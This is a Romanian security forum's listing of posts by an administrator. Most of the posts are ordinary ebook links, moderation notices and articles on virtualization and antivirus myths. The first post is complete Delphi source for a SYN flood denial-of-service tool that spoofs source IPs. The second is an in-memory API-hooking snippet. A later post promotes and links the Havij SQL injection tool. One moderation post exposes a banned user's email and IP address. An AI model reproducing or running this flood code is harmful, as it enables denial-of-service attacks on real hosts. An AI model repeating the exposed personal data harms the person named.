Jump to content

Nytro

Administrators
  • Posts

    18712
  • Joined

  • Last visited

  • Days Won

    701

Everything posted by Nytro

  1. [Delphi] SYN Flood Author: carbon (cred) program SynFlood; {$APPTYPE CONSOLE} uses Windows, Winsock; //WinSock2; const IP_HDRINCL = 2; // IP Header Include Header_SEQ = $19026695; SEQ = $28376839; SYN_DEST_IP = '172.17.103.127'; //????IP FAKE_IP = '10.168.150.1'; //??IP???????????IP????B??? //TCP? 20? type TCP_HEADER = record th_sport : Word; //16???? th_dport : Word; //16????? th_seq : DWORD; //32???? th_ack : DWORD; //32???? th_lenres : Byte; //4?????+6??????4? th_flag : Byte; //2????+6???? 2?SYN?1?FIN?16?ACK?? th_win : Word; //16????? th_sum : Word; //16???? th_urp : Word; //16???????? end; // IP ? 20? type IP_HEADER = record h_verlen : Byte; //4?????+4?IP??? tos : Byte; //8?????TOS?????????????????????????? total_len : Word; //16???????? IP????????????????20??? ident : Word; //16?IP????????????????????? frag_and_flags : Word; //Fragment Offset 13 IP?????? ttl : Byte; //8?????TTL??????????????? proto : Byte;//8????(TCP, UDP ???) ???ICMP?1?IGMP?2?TCP?6?UDP?17? checksum : Word; //16?IP????? sourceIP : LongWord; //32??IP?? destIP : LongWord; //32???IP?? end; //TCP?? 12? type PSD_HEADER = record saddr : DWORD; //??? daddr : DWORD; //???? mbz : Byte; //?? ptcl : Byte; //???? tcpl : WORD; //TCP?? end; type CLIENTPARA = record Port:integer; IP:string; end; var clientpa :^CLIENTPARA; SendSEQ :Integer = 0; TimeOut :Integer =5000; function WSASocketA(af, wType, protocol: integer;lpProtocolInfo: pointer;g, dwFlags: dword): integer;stdcall;external 'ws2_32.dll'; function setsockopt( const s: TSocket; const level, optname: Integer; optval: PChar; const optlen: Integer ): Integer; stdcall;external 'ws2_32.dll'; function IntToStr(I: integer): string; begin Str(I, Result); end; function StrToInt(S: string): integer; begin Val(S, Result, Result); end; function LowerCase(const S: string): string; var Ch: Char; L: Integer; Source, Dest: PChar; begin L := Length(S); SetLength(Result, L); Source := Pointer(S); Dest := Pointer(Result); while L <> 0 do begin Ch := Source^; if (Ch >= 'A') and (Ch <= 'Z') then Inc(Ch, 32); Dest^ := Ch; Inc(Source); Inc(Dest); Dec(L); end; end; { CheckSum:????????? IP?????????????IP??????????0?IP_HEADER.checksum=0?, ??????IP???????????????? TCP??????IP???????????????????????????? ??TCP??????????????????????TCP??????? ???TCP??????????????TCP??????? } function checksum(var Buffer; Size: integer): word; type TWordArray = array[0..1] of word; var lSumm: LongWord; iLoop: integer; begin lSumm := 0; iLoop := 0; while Size > 1 do begin lSumm := lSumm + TWordArray(Buffer)[iLoop]; inc(iLoop); Size := Size - SizeOf(word); end; if Size = 1 then lSumm := lSumm + Byte(TWordArray(Buffer)[iLoop]); lSumm := (lSumm shr 16) + (lSumm and $FFFF); lSumm := lSumm + (lSumm shr 16); Result := word(not lSumm); end; //syn???? function SynFloodThreadProc(p:Pointer):LongInt;stdcall; var WSAData :TWSAData; sock :TSocket; Remote :TSockAddr; ipHeader :IP_HEADER; tcpHeader :TCP_HEADER; psdHeader :PSD_HEADER; ErrorCode,bOpt,counter,FakeIpNet,FakeIpHost,datasize :integer; Buf :array [0..127] of char; //FromIP :string; begin Result :=0; //????????? if WSAStartup(MAKEWORD(2,2), WSAData)<>0 then exit; sock :=WSASocketA(AF_INET, SOCK_RAW, IPPROTO_RAW, nil, 0, {WSA_FLAG_OVERLAPPED}0); if sock = INVALID_SOCKET then exit; //??ip?? bOpt := 1; //??IP_HDRINCL????????IP?????????? if setsockopt(sock,IPPROTO_IP, IP_HDRINCL,@bOpt, SizeOf(bOpt)) = SOCKET_ERROR then exit; //?????? //ErrorCode :=setsockopt(sock,SOL_SOCKET,SO_SNDTIMEO,pchar(TimeOut),sizeof(TimeOut)); //if ErrorCode = SOCKET_ERROR then exit; Randomize; FillChar(Remote,sizeof(Remote),#0); Remote.sin_family :=AF_INET; //Remote.sin_addr.s_addr:=inet_addr(SYN_DEST_IP); Remote.sin_addr.S_addr :=inet_addr(pchar(CLIENTPARA(p^).IP)); Remote.sin_port :=htons(CLIENTPARA(p^).Port); FakeIpNet:=inet_addr(FAKE_IP); FakeIpHost:=ntohl(FakeIpNet); //??IP?? ipHeader.h_verlen :=(4 shl 4) or (sizeof(ipHeader) div sizeof(LongWord)); //???IP??????????? ipHeader.total_len :=htons(sizeof(ipHeader)+sizeof(tcpHeader)); //16???????? ipHeader.ident:=1; //16??? ipHeader.tos :=0; //IP???? ipHeader.frag_and_flags:=0; //???? ipHeader.ttl:=128; //8?????TTL ipHeader.proto:=IPPROTO_TCP; //8???(TCP,UDP…) UDP=17 $11 ipHeader.checksum:=0; //16?IP????? ipHeader.sourceIP:=htonl(FakeIpHost+SendSEQ); //32??IP?? //ipHeader.destIP:=inet_addr(pchar(SYN_DEST_IP)); //32???IP?? ipHeader.destIP:=inet_addr(pchar(CLIENTPARA(p^).IP)); //??????? {FromIP:=IntToStr(Random(254)+1)+'.'+ IntToStr(Random(254)+1)+'.'+ IntToStr(Random(254)+1)+'.'+Inttostr(Random(254)+1); ipHeader.sourceIP:=inet_Addr(PChar(FromIP)); //32??IP?? ipHeader.destIP:=Remote.sin_addr.S_addr; //32???IP?? } //??TCP?? tcpHeader.th_sport:=htons(Random(65536)+1); //??????? tcpHeader.th_dport:=Remote.sin_port; //????? //tcpHeader.th_sport:=htons(7000); //???? //tcpHeader.th_dport:=htons(8080); //????? tcpHeader.th_seq:=htonl(SEQ+SendSEQ); //SYN??? tcpHeader.th_ack:=0; //ACK?????0 tcpHeader.th_lenres:=(sizeof(tcpHeader) shr 2 shl 4) or 0; //TCP?????? tcpHeader.th_flag:=2; //???????????2?SYN?1?FIN?16?ACK?? tcpHeader.th_win:=htons(16384); //???? tcpHeader.th_urp:=0; //????? tcpHeader.th_sum:=0; //??? //??TCP??????????????????? psdHeader.saddr:=ipHeader.sourceIP; //??? psdHeader.daddr:=ipHeader.destIP; //???? psdHeader.mbz:=0; psdHeader.ptcl:=IPPROTO_TCP; //???? psdHeader.tcpl:=htons(sizeof(tcpHeader)); //TCP???? while true do begin //???10,240?????????? //writeln('.'); for counter:=0 to 10239 do begin inc(SendSEQ); if (SendSEQ=65536) then SendSEQ :=1; //????? //??IP?? ipHeader.checksum :=0; //16?IP????? ipHeader.sourceIP :=htonl(FakeIpHost+SendSEQ); //32??IP?? //??TCP?? tcpHeader.th_seq :=htonl(SEQ+SendSEQ); //SYN??? tcpHeader.th_sum :=0; //??? //??TCP??? psdHeader.saddr :=ipHeader.sourceIP; //??TCP??????????????TCP??? FillChar(Buf,SizeOf(Buf),#0); //??????????????Buf????TCP???? CopyMemory(@Buf[0],@psdHeader,SizeOf(psdHeader)); //12 CopyMemory(@Buf[SizeOf(psdHeader)],@tcpHeader,SizeOf(tcpHeader)); //20 TCPHeader.th_sum:=checksum(Buf,SizeOf(psdHeader)+SizeOf(tcpHeader)); //32 //??IP???? CopyMemory(@Buf[0],@ipHeader,SizeOf(ipHeader)); //20 CopyMemory(@Buf[SizeOf(ipHeader)],@tcpHeader,SizeOf(tcpHeader)); //20 FillChar(Buf[SizeOf(ipHeader)+SizeOf(tcpHeader)],4,#0); datasize :=SizeOf(ipHeader)+SizeOf(tcpHeader); ipHeader.checksum:=checksum(Buf,datasize); //40 //??????? CopyMemory(@Buf[0],@ipHeader,SizeOf(ipHeader)); //20 //??TCP?? ErrorCode:=sendto(sock, buf, datasize, 0, Remote, sizeof(Remote)); if ErrorCode=SOCKET_ERROR then exit; write('.'); end; //end for writeln(''); end; //end while closesocket(sock); WSACleanup(); end; procedure Usage; begin WriteLn('SynFlood 0.1 for 2000/XP/2003'); WriteLn('http://www.wrsky.com'); WriteLn('hnxyy@hotmail.com'); WriteLn('QQ:19026695'); WriteLn; WriteLn('Usage: SynFlood -h:IP -p:port'); end; procedure ParseOption(Cmd, Arg: string); begin if arg='' then begin Usage; Halt(0); end; if lstrcmp('-h:', pchar(LowerCase(Cmd))) = 0 then begin clientpa^.IP :=arg; end else if lstrcmp('-p:', pchar(LowerCase(Cmd))) = 0 then begin clientpa^.Port :=StrToInt(Arg); end else begin Usage; Halt(0); end; end; procedure ProcessCommandLine; var CmdLn: integer; begin CmdLn := 1; if (ParamCount<2) or (ParamCount>2) then begin Usage; Halt(0); end; new(clientpa); while Length(ParamStr(CmdLn)) <> 0 do begin ParseOption(Copy(ParamStr(CmdLn), 1, 3), Copy(ParamStr(CmdLn), 4, Length(ParamStr(CmdLn)) - 2)); Inc(CmdLn); end; end; var ThreadID:DWord; begin ProcessCommandLine; CreateThread(nil, 0, @SynFloodThreadProc, clientpa, 0, ThreadID); while True do Sleep(1); end.
  2. [snippet] API Spoofing Author: carbon (cred) procedure CopyMemory(Destination, Source:Pointer; dwSize:DWORD); asm PUSH ECX PUSH ESI PUSH EDI MOV EDI, Destination MOV ESI, Source MOV ECX, dwSize REP MOVSB POP EDI POP ESI POP ECX end; var pMsgBoxA: Pointer; pOther: Pointer; pCode: Pointer; dwNull: Pointer; dwRelative: DWORD; xMessageBoxA: function(hWindow:HWND; lpText:PChar; lpCaption:PChar; uStyle:UINT):UINT; stdcall; begin pMsgBoxA := GetProcAddress(LoadLibraryA('user32.dll'), 'MessageBoxA'); pOther := GetProcAddress(LoadLibraryA('user32.dll'), 'GetTopWindow'); pCode := VirtualAlloc(nil, 10, MEM_COMMIT, PAGE_READWRITE); if ((Assigned(pMsgBoxA)) and (Assigned(pOther)) and (Assigned(pCode))) then begin PByte(pCode)^ := $55; // PUSH EBP PByte(DWORD(pCode) + 1)^ := $8B; // MOV EBP >> PByte(DWORD(pCode) + 2)^ := $EC; // , ESP dwRelative := DWORD(pMsgBoxA) - DWORD(pOther); PByte(DWORD(pCode) + 3)^ := $E9; // JMP PDWORD(DWORD(pCode) + 4)^ := dwRelative - 3; // user32.MessageBoxA // - 3 because the JMP is @ + 3 VirtualProtect(pOther, 10, PAGE_EXECUTE_READWRITE, @dwNull); CopyMemory(pOther, pCode, 10); VirtualFree(pCode, 0, MEM_RELEASE); xMessageBoxA := Pointer(@GetTopWindow); xMessageBoxA(0, 'Spoofed API', 'TEST', 0); end; end.
  3. Moving to Microsoft Visual Studio 2010 Developers, we’re pleased to announce another free offering: Moving to Microsoft Visual Studio 2010 (Microsoft Press, 2011; 336 pages), written by Patrice Pelland, Pascal Paré, and Ken Haines. Here’s a little bit about the authors: Ken Haines is a software development engineer at Microsoft, working in the Consumer and Online Division. He has a passion for distributed applications in the cloud and strives to help customers and partners find the right solution for their needs. Pascal Paré has worked at Microsoft since 2006, where he has held positions as a software engineer on both development and testing teams. Patrice Pelland is a principal development manager at Microsoft, working in the Consumer and Online Division. He leads a development team that is focused on innovation and incubation across all Microsoft consumer products. Moving to Microsoft Visual Studio 2010 was written with three audiences in mind: Part I is for developers moving from Visual Studio 2003 to Visual Studio 2010. Part II is for developers moving from Visual Studio 2005. And Part III is for developers moving from Visual Studio 2008. Please see this post for an extensive description of the book’s content, including “Who Is This Book for?,” “What Is the Book About?,” and “How Will This Book Help Me Move to Visual Studio 2010?” (Note that the links in that post are to a draft preview version of the book. Links to the final and complete book appear immediately below in this post.) Download: http://download.microsoft.com/download/9/0/B/90B96800-6765-4AC2-A79F-A2E9116F2157/Moving%20to%20Microsoft%20Visual%20Studio%202010%20ebook.pdf http://download.microsoft.com/download/9/0/B/90B96800-6765-4AC2-A79F-A2E9116F2157/Moving%20to%20Microsoft%20Visual%20Studio%202010%20ebook.xps Book's sample code: http://download.microsoft.com/download/9/0/B/90B96800-6765-4AC2-A79F-A2E9116F2157/Moving%20to%20Microsoft%20Visual%20Studio%202010%20sample%20code.zip Sursa: http://blogs.msdn.com/b/microsoft_press/archive/2010/09/13/free-ebook-moving-to-microsoft-visual-studio-2010.aspx
  4. Quick guide to SQL Injection attacks and defenses Authors: ITSecTeam O parte din articol: A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands. SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. .................................................................... Download: http://itsecteam.com/files/Quick%20guide%20to%20SQL%20Injection%20attacks%20and%20defenses%20-%20english.pdf
  5. Am vazut ca sunt multi fani ai acestui program. A aparut aceasta versiune de curand. Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system. The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij. The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users. Havij v1.13 Advanced SQL Injection Tool released. New features of this version are: * Oracle error based database added with ability to execute query. * Getting tables and column when database name is unknown added (mysql) * Another method added for finding columns count and string column in PostgreSQL * Automatic keyword finder optimized and some bugs fixed. * A bug in finding valid string column in mysql fixed. * 'Key is not unique' bug fixed * Getting data starts from row 2 when All in One fails - bug fixed * Run time error when finding keyword fixed. * False table finding in access fixed. * keyword correction method made better * A bug in getting current data base in mssql fixed. * A secondary method added when input value doesn't return a normal page (usually 404 not found) * Data extraction bug in html-encoded pages fixed. * String or integer type detection made better. * A bug in https injection fixed. How to use This tool is for exploiting SQL Injection bugs in web application. For using this tool you should know a little about SQL Injections. Enter target url and select http method then click Analyze. Note: Try to url be valid input that returns a normal page not a 404 or error page. Informatii: http://itsecteam.com/en/projects/project1.htm Descarcare: http://itsecteam.com/files/havij/Havij1.13Free.rar PS: Nu l-am incercat, nu stiu daca e infectat, dar daca il luati de pe site-ul oficial, de la link-ul postat nu cred ca o sa fie probleme.
  6. Cred ca a aparut de curand, daca nu chiar azi. Detalii: http://www.ymessengerblog.com/blog/2010/11/16/introducing-the-new-yahoo-messenger-beta/ Cred ca cea mai mare noutate e integrarea serviciilor Facebook si Twitter. Eu nu l-am incercat, sunt pe Linux, nu ma pot da prea multe detalii. Il puteti descarca de aici: http://messenger.yahoo.com/beta/win
  7. Cea de Stephen King nu? Am citit-o eu, mi-au placut unele idei, e interesanta.
  8. TinKode: Eu chiar m-as bucura daca ai lucra la Google sau o alta firma renumita, in acest domeniu, stiu ca asta iti doresti. Dar nu e chiar asa. Pentesting inseamna retelistica, cunostinte foarte bune de programare (C, ASM -> BOFs) si multe altele.
  9. "Un lucru care vreau s? se ?tie despre mine: eu nu m? consider hacker. Am observat c? mul?i pu?tani se cred a?a (folosesc programe f?cute de al?ii pentru a putea s? sparg? alte site-uri, ei ne?tiind nici m?car cum func?ioneaz? acele aplica?ii – ??tia, mai pe scurt, sunt numi?i "script-kiddies")" +1 Kabron: Nu a mintit. Oricum, cred ca isi face degeaba sperante ca il angajeaza cineva, nu prea se cauta astfel de lucruri, daca se axa pe networking, cryptografie statea altfel treaba.
  10. Cred ca datele urmau sa ajunga la: lx.8@hotmail.com. In fine, era infectat, ban permanent, mutat la gunoi.
  11. Testat TV-MAXE pe Mandriva, merge perfect, felicitarile mele autorului.
  12. Nici nu a trebuit sa citesc ce contine acest topic sa imi dau seama ca locul sau este la Gunoi. Nu am descarcat ce ai postat tu, dar titlul spune totul. Ban permanent.
  13. Sfaturi bune de luat in seama pentru servere dedicate Author: tex Cateva sfaturi bune de luat in seama atunci cand doriti sa cumparati un server dedicat: * Uitati-va atent pe site-ul web al providerului dupa informatiile companiei, date fiscale si obligatoriu sa aibe la contact numere de telefon. * Intrebati de disponibilitatea suportului tehnic. * Feriti-va de trafic nelimitat. Traficul nelimitat presupune o conexiune BULK, in mare parte provine din retele de proasta calitate sau MAN/LAN-uri si peer-uri sinistre, spre diferenta de o retea premium unde traficul costa bani! * Intrebati daca latimea de banda alocata este garantata sau best effort. 100 mbps best effort poate insemna si 2Mbps daca este utilizare mare sau daca providerul nu a auzit ce este ala QoS. * Daca aveti clienti sau site-uri web importante, nu va zgarciti la bani si nu luati desktop-uri cu discuri low profile de la piata. Alea nu sunt servere! * In mod obligatoriu, intrebati providerul daca in caz de probleme va poate oferi consola IPKVM si ce costuri implica asta. Eventual, daca serverul are iLO / ProLiant Onboard Administrator (pentru HP) sau DELL Drac ori Spider Lantronix sau alt model (pe usb). Aici va pot da un exemplu bun: In USA. la o companie respectabila IPKVM costa 35 usd lunar, timp in care in Romania la GTS telecom costa 40 de euro pe ora. * Intrebati din capul locului cat costa upgrade-ul pentru ram, cpu, disc-uri. (daca este cazul). * Uitati-va la tipul de CPU; De multe ori din asta va dati seama daca este server sau desktop. Nu orice coaje conectata la tensiune electrica, internet si cu linux poate fi numit Server! Sursa: https://www.rtfm.ro/diverse/sfaturi-bune-de-luat-in-seama-pentru-servere-dedicate/
  14. Ban permanent + mutare la gunoi. Nu faceti astfel de tampenii aici. Mail-ul sau: denis_948@yahoo.com IP: 89.123.137.227 (Deva, Romtelecom).
  15. Eu am incredere deplina in cercetatorii care se ocupa cu asa ceva, prin ei inteleg eu om inteligent (un exemplu). Nu fac ei prostii, nu risca nimic, si totul e bine calculat de multe ori si de catre multe persoane.
  16. Ia cauta pe aici prin categorie, Romania are cel mai rapida conexiune la Internet din Europa. Stam bine cand e vorba de IT. Da, e un lucru bun. In primul rand va ajuta industria IT romaneasca, va oferi niste locuri de munca, sunt unii (ca mine) care ar prefera limba romana in locul limbii engleze...
  17. Complicat, e mai usor de inteles explicatia cum ca un batranel a pocnit din degete si asa a aparut totul. Da, da, de multi ani tot murim din diverse cauze... Oamenii de rand isi folosesc materia cenusie din ce in ce mai putin.
  18. Introducere in Virtualizare Virtualizarea este un concept ce presupune rularea unui sistem de operare pe ma?ini (computere) virtuale simulate cu ajutorul unor aplica?ii software dedicate. Aceste aplica?ii pot emula func?ionarea tuturor componentelor unui sistem informatic real (FDD, CD-ROM, HDD, memorie, CPU, dispozitive USB, plac? de re?ea). Ma?ina virtual? const?, în esen??, într-un fi?ier de dimensiuni variabile ce simuleaz? harddisk-ul ?i alte câteva fi?iere ce con?in configur?rile ma?inii respective (dimensiunea memoriei, etc.). Puterea de calcul ?i memoria RAM sunt partajate din resursele ma?inii reale pe care se g?se?te instalat? aplica?ia de emulare. Cu alte cuvinte, dac? dori?i s? vede?i cum func?ioneaz? un nou sistem de operare, îl pute?i instala ?i testa pe o ma?in? virtual? f?r? a mai trebui s? formata?i harddisk-ul calculatorului real. De asemenea, dac? dori?i s? testa?i func?ionarea unei aplica?ii software pe un anumit sistem de operare, pute?i folosi o ma?in? virtual? f?r? grija faptului c? ar putea fi afectat sistemul de operare real (prin virusare sau datorit? func?ion?rii anormale a aplica?iei, etc.). Posibilit??ile virtualiz?rii sunt limitate doar de imagina?ie. Un sistem informatic destinat activit??ilor de birou folose?te pe toat? durata sa de func?ionare aproximativ 10 % din resursele disponibile (procesor ?i memorie). Pentru servere, consumul de resurse se situeaz? la o valoare medie de 40% din resurse. Rezult? c?, pentru sistemele desktop r?mân neutilizate 90 % din resurse iar pentru servere 60 % – ceea ce reprezint? o putere de calcul foarte mare. Avantajele virtualizarii - prin virtualizare, multiple aplicatii si sisteme de operare pot rula pe un singur sistem fizic; - serverele pot fi consolidate in masini virtuale; - resursele IT sunt tratate ca o parte comuna pentru a fi alocate intr-o maniera controlata masinii virtuale. Izolarea virtualizarii - masinile virtuale sunt complet izolate de masina gazda sau alte masini virtuale. Daca o masina virtuala “crapa” (se blocheaza, cedeaza), restul nu sunt afectate; - prin virtualizare, datele (informatiile) nu se scurg dincolo de masina virtuala si aplicatiile pot doar comunica peste conexiunile de internet. Incapsularea masinii virtuale - intregul mediu al masinii virtuale este salvat ca un singur fisier, usor de facut back-up, mutat sau copiat; - masinile virtuale sunt compatibile cu standardele hardware. Tendin?a de ast?zi, este ca pe o ma?in? fizic? s? se instaleze mai multe ma?ini virtuale (în general cu rol de server) pentru a exploata la maxim resursele procesorului ?i ale memoriei pe durata de via?? a ma?inii fizice. Dintre solu?iile de virtualizare prezente pe pia??, amintesc Microsoft Virtual PC, Microsoft Virtual Server, VMware (aparut in 1999), QEMV, Virtual Box (alternativa open-source), Blue Pill (folosit de AMB Pacifica), Kernel based Virtual Machine, Virtual Iron (pentru 32 si 64-bit), Virtual Logix (foloseste virtualizarea hard pentru a rula sisteme de operare Linux si Real Time), Xen, etc. Autor: Ilie George (cred) Sursa: Introducere in Virtualizare | WorldIT
  19. Adev?ruri sau mituri urbane în securitatea IT? A?a cum se întâmpl? ?i în alte domenii, industria de securitate IT nu a fost ocolit? de mituri urbane - pove?ti care se r?spândesc ?i care, pe parcursul timpului, devin acceptate ca adev?ruri generale. securitate antivirusPanda Security a cerut comunit??ii sale de utilizatori, în principal prin intermediul Facebook ?i Twitter, s? precizeze care sunt cele mai cunoscute mituri referitoare la companiile de securitate antivirus. Rezultatele sondajului au fost publicate pe blogul companiei ?i comentate de directorul tehnic, Luis Corrons. 1.Companiile de securitate produc viru?i. Asta este o afirma?ie vehiculat? nu doar în leg?tur? cu Panda Security, ci ?i cu celelalte companii din acest sector. „Afirma?ia este absurd? - dac? ar fi adev?rat, un astfel de scandal ar fi fost descoperit cu siguran?? în cei 20 de ani sau mai mul?i de când sectorul securit??ii IT este dedicat protej?rii utilizatorilor. Una dintre principalele probleme pe care industria le-a avut de rezolvat a fost cum sa fac? fa?? efortului de procesare a unui num?r tot mai mare de amenin??ri pentru a men?ine utilizatorii proteja?i. Publicitate 2. Companiile de securitate angajeaz? hackeri. Corrons afirm? c?, în acest caz, nu poate vorbi în numele întregii industrii antivirus, dar sus?ine c? produc?torul pe care îl reprezint? nu a contactat niciodat?, cu bun? ?tiin??, hackerii „black hat”. „Cu toate acestea, am angajat - ?i suntem mereu în c?utare - de hackeri „white hat”, b?ie?ii buni. O variant? a acestui mit este c? trebuie s? fii inginer IT pentru a lucra în securitate IT, ceea ce este, de asemenea fals. Profilul celor care lucreaz? în aceast? industrie este extrem de variat: ingineri, matematicieni, fizicieni, autodidac?i etc. 3. Nu exista viru?i pentru Mac, Linux sau platforme de telefonie mobil?. Ne-am dori cu to?ii ca toate acestea s? fie adev?rate! Este general sus?inut faptul c? nici una dintre aceste platforme nu prezint? riscuri pentru utilizatori ?i c? viru?ii sunt concepu?i doar pentru platforme Windows: adev?rul este c? exist? viru?i pentru toate aceste platforme. Diferen?a const? în volumul de amenin??ri care circul?, în compara?ie cu cele proiectate pentru Windows. Explica?ia este simpla: hackerii sunt în c?utare de profit. Dac? scopul este ca malware-ul s? ajung? la cât mai mul?i oameni, pentru a atrage mai multe poten?iale victime de la care s? poat? fura, care este cea mai bun? ?int?? O platform? cu 10 de milioane de utilizatori sau una cu 500 de milioane? R?spunsul este evident. 4. Sunt necesare cuno?tin?e considerabile pentru a fi hacker, a dezvolta viru?i ?i pentru a te înfiltra în sisteme! În unele cazuri da, în altele nu! Cu ceva ani în urm? era dificil ca cineva s? dezvolte viru?i, viermi, troieni etc - iar cuno?tin?ele tehnice erau necesare. De fapt, mul?i hackeri au început „doar jucându-se, iar în timp au înv??at, dobândind cuno?tin?e semnificative despre limbaje de programare, protocoale de comunicare etc. Ast?zi acest lucru nu mai este necesar - a se vedea Opera?iunea Mariposa la care am fost martori anul acesta, în care cei responsabili au avut cuno?tin?e destul de limitate. Creatorul programului malware a fost un student la medicin?, de 23 de ani, din Slovenia. Un motiv pentru demolarea acestui mit rezid? în faptul c? programele sunt vândute pe Internet, permi?ând amatorilor s? genereze ?i s? configureze malware. Nu se poate spune chiar c? oricine o poate face, dar cu pu?ine cuno?tin?e ?i determinare, este posibil s? construie?ti (de exemplu) un botnet care poate infecta 13 milioane de calculatoare din întreaga lume (cum a fost cazul Mariposa). 5. Femeile nu lucreaz? în companiile de securitate. Aceast? presupunere este la fel de frecvent? pe cât este de neadev?rata. În ceea ce prive?te compania pe care o conduce, Corrons sus?ine c? mai mult de 30% din for?a de munc? este de sex feminin ?i c? si multe femei ocup? pozi?ii în domenii tehnice sau de management. Aceast? cifr? este în cre?tere, ?i un num?r tot mai mare de femei sunt preg?tite pentru domenii cum ar fi securitatea IT. 6. Securitate 100% ?i control deplin al vie?ii private! Nu exist? o garan?ie deplin?: simpla instalare a unui antivirus nu garanteaz? protec?ie 100%. De fapt, nimic nu poate garanta aceasta. În fiecare zi sunt create mii de noi amenin??ri, iar acestea trebuie s? ajung? la laboratoare de securitate pentru a fi analizate, înainte ca firmele de securitate s? creeze „vaccinurile” corespunz?toare. Unele dintre aceste noi amenin??ri sunt detectate datorit? tehnologiilor proactive concepute pentru a detecta malware-ul necunoscut, dar nu toate! Din momentul în care apare o amenin?are ?i pân? când solu?ia corespunz?toare este disponibil?, utilizatorii sunt expu?i la riscuri. Pe de alt? parte, nu toate companiile de securitate au acces la absolut toate probele noi de malware. Prin urmare, chiar dac? ave?i instalat un software de securitate, nu exist? înc? o garan?ie total? de securitate. În acest domeniu putem spune c? asist?m la o întrecere între companiile de securitate ?i „b?ie?ii r?i”. Din acest motiv este recomandabil ca, pe lâng? a pl?ti pentru a beneficia de o suit? de securitate bun?, s? fi?i aten?i la recomand?rile de securitate de baz?. În chestiunea controlului vie?ii private, problema se pune diferit. Când vorbim despre via?a privat?, trebuie s? fim aten?i ?i la informa?iile pe care le oferim voluntar, prin intermediul re?elelor sociale sau comunit??ilor. Pentru astfel de cazuri nu exist? o solu?ie de tip antivirus, care s? poat? împiedica partajarea de astfel de informa?ii. O bun? preg?tire ?i mult? precau?ie cu privire la ceea ce faci public în cadrul acestor comunit??i sunt necesare! 7. Viru?i, viru?i, viru?i… S? arunc?m o privire la câteva dintre cele mai r?spândite mituri urbane: a.To?i viru?ii sunt la fel! În practic?, „virus”" este termenul generic utilizat pentru a se referi la toate amenin??rile informatice, dar - tehnic vorbind - fiecare este definit? de un anumit tip de malware. În termenul „viru?i” sunt inclu?i viermi, troieni, phishing, adware, spyware, instrumente de hacking etc ... Deci nu to?i viru?ii sunt la fel! b.Un virus poate deteriora hardware-ul. Adev?rul este, pur ?i simplu, NU. Un virus nu poate face s? explodeze ecranul sau s? deterioreze placa de baz?... Viru?ii pot modifica set?rile de BIOS, dar problema se poate rezolva prin restabilirea configura?iei originale. ?i nu, unit??ile CD sau DVD nu pot fi deteriorate de viru?i! c.Un virus poate fi transmis unui CD-ROM. Nu este cazul, dac? v? referi?i la unitatea CD în sine, ca mecanism. În procesul de copiere a unor informa?ii pe un suport de tip CD/DVD pot fi îns? distribuite, în necuno?tin?? de cauz?, ?i amenin??ri informatice. Acela?i lucru este valabil ?i dac? ne referim la dispozitivele USB (telefoane, memorii USB, playere MP3 sau MP4). d.Un sistem pe 32 de bi?i este la fel de sigur ca un sistem pe 64 de bi?i. Acest lucru nu este adev?rat. Un sistem pe 64 de bi?i este pu?in mai sigur decât un sistem pe 32 de bi?i, pentru c? cele mai multe tipuri de malware au fost create pentru sistemele pe 32 de bi?i, de?i mare parte dintre acestea „func?ioneaz?”, de asemenea, ?i pe 64 de bi?i ... e.„Mie nu mi se va întâmpla, de aceea nu am nevoie de protec?ie” , „am toate patch-urile instalate, astfel încât nimic nu mi se poate întâmpla”, „eu nu deschid ata?amente de e-mail, astfel încât viru?ii nu pot intra pe calculatorul meu” - cu to?ii am auzit adesea acest tip de expresii… ?i toate sunt false”! În zilele noastre exist? o mul?ime de moduri de a te infecta: navigând pe Web, folosind Facebook sau Twitter, folosind aplica?iile de mesagerie instantanee…). Hackeri î?i caut? victimele f?r? discriminare (indiferent de ceea ce au sau nu instalat pe computerele lor - atât timp cât acestea fac cump?r?turi online sau internet banking!), a?a c? este mai bine s? previi decât s? dai banii pe o umbrel? în timp ce deja plou?! 8. Teorii conspira?ioniste ... haide?i s? arunc?m o privire: a.Industria antivirus strânge informa?ii sensibile pentru a servi guvernele. Evident, aceasta ar necesita comiterea mai multor infrac?iuni, ca s? nu vorbim despre implica?iile etice sau morale – de aceea pare foarte pu?in probabil ca o companie de securitate s? opereze într-un asemenea mod. b.Viru?ii sunt crea?i de guverne pentru a monitoriza cet??enii. Nu exist? înc? nici un fel de dovad? despre un astfel de malware care s? fi fost creat de c?tre un guvern pentru a-?i spiona cet??enii... Acest tip de argument pare s? fi fost inspirat mai mult de la Hollywood decât de lumea real?. Ce este sigur este c?, dac? un astfel de virus ar exista, ar fi detectat ?i neutralizat ca oricare altul. c.Windows a fost programat pentru a include backdoors. Windows este un sistem cu probleme de securitate proprii, care sunt în mod continuu identificate ?i reparate. Cu toate acestea, aproape în fiecare lun?, noi vulnerabilit??i de securitate sunt descoperite. Adev?rul este c? nu putem nega sau confirma, oficial, dac? în sistem au fost incluse inten?ionat backdoors. Îns?, cu siguran??, dac? ar fi existat, ar fi fost f?cute publice - deoarece exist? mul?i cercet?tori care lucreaz? intens la diversele sisteme de operare Microsoft pentru a le îmbun?t??i. Sursa: Adev?ruri sau mituri urbane în securitatea IT?
